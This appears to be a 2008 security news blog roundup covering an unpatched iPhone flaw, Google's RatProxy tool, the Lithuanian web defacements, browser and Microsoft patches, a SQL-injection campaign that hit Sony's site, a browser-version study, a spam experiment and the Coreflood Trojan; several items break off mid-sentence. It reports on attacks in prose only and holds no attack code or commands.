Defense in Depth

A leading Mac OS X researcher says Apple has not kept the iPhone operating system up to date with patches it has issued for the desktop.

The iPhone runs a stripped-down version of Mac OS 10.5 and automatically checks for security updates. The last update for the phone, 1.1.4, was issued in February.

That means iPhone users are still vulnerable to a flaw discovered by Charlie Miller in March.

During the CanSecWest conference, Miller found and used a buffer overflow in Safari in the Apple WebKit to win a $10,000 "Pwn to Own" contest. Apple patched Miller's Safari vulnerability for the desktop in April, but so far has not issued a similar patch for the iPhone.

Miller told the Washington Post recently he has an exploit of the flaw that will work on the iPhone.

Meanwhile, ZDNet's Ryan Naraine points out that there's another upcoming iPhone exploit expected soon from Aviv Raff.

Speculation within the security community is that Apple is currently focused on the 3G version of the iPhone. Upgrades to current iPhones may be pushed out in advance or concurrent with the July 11 release of iPhone 2.0.

Apple does not respond to requests for comment on its software security policies.

Google released a free tool Tuesday that should help Web developers find and fix cross-site vulnerabilities.

The tool, RatProxy, is described by Google as "a semi-automated, largely passive Web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex Web 2.0 environments."

The tool is versatile, detecting and ranking a broad class of vulnerabilities. Included are script injections, cross-site trust attacks, content-serving vulnerabilities, cross-site request forgeries (XSRF), and cross-site scripting (XSS).

RatProxy runs on Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments.

Google RatProxy detects and prioritizes a variety of common cross-site vulnerabilities.

(Credit: Google)

Last weekend, several hundred Lithuanian Web sites were defaced with pro-Soviet and anti-Lithuanian slogans, according to The New York Times.

Last Friday, Lithuanian government sites were warned of an impending Web attack and mounted appropriate defenses. Several hundred commercial sites did not do so and over the weekend took the brunt of the attack. By Monday, most all of the sites had been restored.

As with last year's Estonian denial-of-service attacks, the new attacks appear to be in reaction to a law outlawing the display of Soviet symbols in Lithuania. Germany has similar laws outlawing the display of Nazi symbols.

Early evidence suggests a group of criminal hackers may have organized the attacks. The IPs used in the attacks appear to be from a variety of nations, but Reston, Va.-based iDefense told the Washington Post that one site, hack-war.ru, appeared to have organized the protest.

Over at our sister site ZDNet, Dancho Danchev examines whether the defacements could escalate into denial-of-service attacks, and concludes they might.

Meanwhile, in his blog, Brian Krebs speculates on nations or nationalistic parties within nations mounting or defending themselves against cyberattacks such as these in the future.

On Thursday, Opera released version 9.51. The new version fixes a few security vulnerabilities and resolves some stability issues. One of the fixes addresses an arbitrary code execution vulnerability that was not previously made public.

Meanwhile, Mozilla released Firefox 2.0.15 with a dozen security fixes, including a few remote-execution vulnerabilities.

Current Firefox 2 users should, however, upgrade to Firefox 3, which includes antimalware protection and other security features.

On Thursday, Microsoft announced four security bulletins for Patch Tuesday next week. The pre-announcement is intended as a heads up for IT departments before Patch Tuesday. All four are considered important, the second-most serious ranking by the software giant.

Among the important patches, two affect vulnerabilities within Windows, with one potentially causing remote code execution, while the other involves spoofing. Another bulletin affects Windows and Microsoft SQ Server and involves privilege elevation. The final bulletin affects Microsoft Exchange Server and also involves privilege elevation

Early Wednesday, antivirus vendor Sophos reported that some visitors to the Sony PlayStation site may have been prompted to download an antivirus scanner.

Pages promoting the PlayStation games SingStar Pop and God of War contained SQL-injected code. Visitors to those specific game pages would see a fake antivirus scan , then a message that their computer was infected with different viruses and Trojan horses. Warned, the user would then be asked to purchase the scanner to remove the bogus malware.

The injected code linking to the scanner has since been removed.

Sophos said the attack could have downloaded malicious payloads, but did not.

Security researcher Dancho Danchev said in his ZDNet blog that Sony wasn't alone. It was one of 794 domains hit in the latest automated SQL-injection campaign using a multilayer fast-flux superstructure built around coldwop.com. Over the last 90 days, Google reports that 794 domains have been infected with code pointing to that domain. These are legitimate sites with vulnerabilities that allow criminal hackers to inject code pointing to their servers.

With fast-flux, a registered domain name stays the same while its node changes frequently, presumably thwarting any attempts to shut down the server hosting malicious content.

Danchev concludes: "If you don't take care of your Web application vulnerabilities, someone else will."

On Wednesday, Microsoft announced new security features within the upcoming release of Internet Explorer 8 Beta 2. The features are designed to combat the rising tide of drive-by downloads and malicious scripts contained within carefully crafted links embedded in e-mail and Web pages. Most of the new features require systems to be running Windows Vista SP1 or Windows XP SP3.

Perhaps the most anticipated addition is Internet Explorer's new antimalware protection. Opera 9.5 and Firefox 3 both recently added antimalware protection. Safari has so far not announced plans for similar protection. Using mostly its own antimalware technology, Microsoft will block emerging threats by masking the entire IE 8 browser screen with a warning to users. The addition of malware protection to the existing antiphishing protection will be re-branded as the Microsoft SmartScreen filter.

IE 8 Beta 2 will have a Cross Site Scripting (XSS) filter, preventing scripts within a link from executing on the browser.

Previously announced features include highlighting domain names from the rest of the URL (so you can visually see that you are on eBay.com, not some other site), and extended verification SSL.

Using Data Execution Protection (DEP) within Windows XP SP3 and Windows Vista SP1, IE 8 will scan downloads and block any that it deems dangerous.

(Credit: Microsoft)

IE 8 Beta 1 has already introduced several changes when handling ActiveX components. Components will be installed per user, which eliminates the need for everyone to have administrator privileges. In addition, you must acknowledge

A group of researches on Tuesday said 637 million Web users are surfing with outdated Internet browsers and therefore at greater risk of Web-based attacks.

Using data collected from Google Web searches and security firm Secunia, the researchers, Stefan Frei (of ETH, Zurich), Thomas Dübendorfer (Google), Gunter Ollmann (IBM ISS), and Martin May (ETH, Zurich), analyzed the browsers used in a new report (PDF). They did so in an effort to understand why so many recent attacks by criminal hackers have been aimed at the browser, and why those attacks have been so successful.

Overall the authors found that roughly 40 percent of users were using insecure versions of Web browsers. Among the least compliant were users of Internet Explorer, which currently dominates the Internet browser market.

The data was collected in mid-June 2008. The users were scattered among 78 percent Internet Explorer users, 16 percent Firefox, 3 percent Safari, and 0.8 percent for Opera. Of these, 52 percent were running the latest version of Internet Explorer, 92 percent for Firefox, 70 percent for Apple, and 90 percent for Opera.

The authors note that it has taken IE 7, the current Internet Explorer release, 19 months to gain only 52 percent of the entire Internet Explorer audience. Forty-eight percent of the users in the study were either using an old version of IE 7 or still had IE 6 installed.

Some of this has to do with how the respective vendors provide updates. IE 7 is currently offered

Taking a cue from Morgan Spurlock who lived on fast food for 30 days in the Super Size Me documentary, McAfee gathered volunteers from around the world who would, for one hour a day, surf the Internet, signing up for various newsletters, filling in various forms. As they did so, the participants were asked to blog about their experiences.

On Tuesday, McAfee released the results of the experiment it called S.P.A.M., or Spammed Persistently All Month.

Over the course of the month, McAfee's test subjects accumulated 104,000 spam messages, or roughly 70 per day per recipient. Put another way, 87 percent of all the e-mail captured on the test laptops was considered to be spam. That isn't too surprising.

What is surprising, according to Dave Marcus, director of security research and communications for McAfee Avert Labs, is the amount of foreign language spam, with Germany and France having the highest percentage of local language spam.

Other findings include:

Men received more spam than women (76.6 per day vs. 60.6 per day).

The United States received more total spam, followed by Brazil and Italy.

Nigerian scam e-mails are more popular in the United Kingdom than in the United States.

What's also interesting, at least to me, is that the McAfee results were similar to results released by Symantec. McAfee used about 50 real-world participants while Symantec used its DeepThreat Network of thousands of computers worldwide.

You can hear more of Dave Marcus' ... Read more

On Monday, SecureWorks released its analysis of the Coreflood Trojan, providing an inside look at a stealthy online predator.

According to a blog by Joe Stewart, director of malware research for SecureWorks, Coreflood started out as an IRC (Internet relay chat) botnet back in 2002. Coreflood--or AFcore, as the author refers to it within the code--is apparently viewed by its author as corporate software that can be tweaked as business needs change. For example, over the last six years, Coreflood has evolved from initiating distributed denial-of-service attacks to collecting IDs and passwords for bank fraud.

With the help of Spamhaus, an antispam organization, SecureWorks was able to gain cooperation from one of the command and control centers for Coreflood. What Stewart found was not only source code but 50 gigabytes of compressed data, searchable in a MySQL database.

Within was 378,758 unique bot IDs over a 16-month period. Logged was the time-stamped lifecycle--from infection to removal--of each compromised computer. Stewart found the average to be about 66 days.

The other find was that many computers within a single company would get infected. Not surprising in and of itself, however, the time stamp provides an insight into the growth of bots within corporate networks and government agencies.

The graph shows how a state policy agency was infected with Coreflood from April 2007 through January 2008.

(Credit: SecureWorks)

What Stewart found by looking at the log files is that Coreflood would enter a network via a drive-by browser exploit, download a